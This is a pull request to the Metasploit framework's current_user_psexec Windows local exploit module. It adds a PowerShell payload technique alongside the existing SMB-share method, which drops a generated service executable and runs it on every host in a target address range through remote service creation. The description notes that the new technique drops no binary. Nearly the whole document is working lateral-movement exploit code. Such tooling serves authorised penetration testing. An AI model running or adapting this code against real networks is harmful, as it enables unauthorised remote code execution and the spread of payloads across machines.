### PR TITLE
Adds Powershell Technique to current_user_psexec

### DIFF
--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
   include Post::Common
   include Post::Windows::Services
   include Exploit::EXE
+  include Exploit::Powershell
   include Post::File
 
   def initialize(info={})
@@ -44,6 +45,10 @@ class Metasploit3 < Msf::Exploit::Local
             [ 'OSVDB', '3106'],
             [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
           ],
+        'DefaultOptions' =>
+            {
+                'WfsDelay'     => 10,
+            },
         'DisclosureDate' => 'Jan 01 1999',
         'Platform'      => [ 'win' ],
         'SessionTypes'  => [ 'meterpreter' ],
@@ -59,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
         ]),
       OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
       OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
       OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
     ])
   end
@@ -66,36 +72,39 @@ class Metasploit3 < Msf::Exploit::Local
   def exploit
     name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
     display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
+    if datastore['TECHNIQUE'] == 'SMB'
+      # XXX Find the domain controller
 
-    # XXX Find the domain controller
+      #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
+      share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
+      print_status "Using #{share_host} as the internal address for victims to get the payload from"
 
-    #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
-    share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
-    print_status "Using #{share_host} as the internal address for victims to get the payload from"
+      # Build a random name for the share and directory
+      share_name = Rex::Text.rand_text_alphanumeric(8)
+      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      share_dir = "#{drive}\\#{share_name}"
 
-    # Build a random name for the share and directory
-    share_name = Rex::Text.rand_text_alphanumeric(8)
-    drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
-    share_dir = "#{drive}\\#{share_name}"
+      # Create them
+      print_status("Creating share #{share_dir}")
+      session.fs.dir.mkdir(share_dir)
+      cmd_exec("net share #{share_name}=#{share_dir}")
 
-    # Create them
-    print_status("Creating share #{share_dir}")
-    session.fs.dir.mkdir(share_dir)
-    cmd_exec("net share #{share_name}=#{share_dir}")
+      # Generate an executable from the shellcode and drop it in the share
+      # directory
+      filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
+      payload_exe = generate_payload_exe_service(
+        :servicename => name,
+        # XXX Ghetto
+        :arch => payload.send(:pinst).arch.first
+      )
 
-    # Generate an executable from the shellcode and drop it in the share
-    # directory
-    filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
-    payload_exe = generate_payload_exe_service(
-      :servicename => name,
-      # XXX Ghetto
-      :arch => payload.send(:pinst).arch.first
-    )
+      print_status("Dropping payload #{filename}")
+      write_file("#{share_dir}\\#{filename}", payload_exe)
 
-    print_status("Dropping payload #{filename}")
-    write_file("#{share_dir}\\#{filename}", payload_exe)
-
-    service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
+      service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
+    else
+      service_executable = cmd_psh_payload(payload.encoded)
+    end
 
     begin
       Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
@@ -113,7 +122,10 @@ class Metasploit3 < Msf::Exploit::Local
 
           print_status("#{server.ljust(16)} Deleting the service")
           service_delete(name, server)
-        rescue
+        rescue Rex::TimeoutError
+          vprint_status("#{server.ljust(16)} Timed out...")
+          next
+        rescue RuntimeError
           print_error("Exception running payload: #{$!.class} : #{$!}")
           print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
           print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
@@ -121,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
         end
       end
     ensure
-      print_status("Deleting share #{share_name}")
-      cmd_exec("net share #{share_name} /delete /y")
-      print_status("Deleting files #{share_dir}")
-      cmd_exec("cmd /c rmdir /q /s #{share_dir}")
+      if datastore['TECHNIQUE'] == 'SMB'
+        print_status("Deleting share #{share_name}")
+        cmd_exec("net share #{share_name} /delete /y")
+        print_status("Deleting files #{share_dir}")
+        cmd_exec("cmd /c rmdir /q /s #{share_dir}")
+      end
     end
 
   end


### PR DESCRIPTION
Using this technique means the user does not have to have an accessible share, and no binary is dropped.

There appears to be an issue with exploits that receive multiple sessions due to a threading deadlock issue:

http://dev.metasploit.com/redmine/issues/8407

This has also been observed in https://github.com/rapid7/metasploit-framework/pull/1732
